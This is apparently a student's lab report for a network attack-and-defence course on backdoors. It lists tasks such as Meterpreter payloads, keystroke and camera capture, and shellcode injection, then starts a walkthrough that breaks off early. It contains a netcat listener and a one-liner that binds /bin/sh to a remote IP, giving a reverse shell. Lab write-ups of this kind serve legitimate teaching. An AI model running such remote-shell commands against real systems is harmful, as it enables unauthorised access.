1. 程式人生 > 其它 >20192401 王麥齊 《網路與系統攻防技術》實驗二 後門原理與實踐

20192401 王麥齊 《網路與系統攻防技術》實驗二 後門原理與實踐

目錄

一、實驗內容

1、使用netcat和socat獲取主機操作Shell,以成功啟動某項任務作為實驗成功的標準;
2、使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell;
3、使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權;
4、使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

二、實驗過程

實踐一:使用netcat獲取主機操作Shell

該實踐首先需要獲取Windows系統的ip地址,然後在windows的powershell(或者cmd等shell中)使用ncat的監聽模式,再連線到kali系統中即可。
(1)使用netcat獲取主機Shell,並cron啟動某項任務。
首先測試主機與Kali虛擬機器之間的連通性,如下圖所示:


kali與主機的連通性

主機與kali機的連通性
接下來輸入:


 ncat.exe -l -p 8888  # 開啟監聽模式,監聽埠8888

開啟Kali系統的終端,輸入:


nc 192.168.43.201 8888 -e /bin/sh
# 把/bin/sh通過e引數繫結,並開啟監聽,那當我們使用遠端主機連線到這臺主機時,就相當於獲得了一個shell

如下圖,即可獲取Kali的shell,輸入命令可以正常執行:

測試傳遞資訊: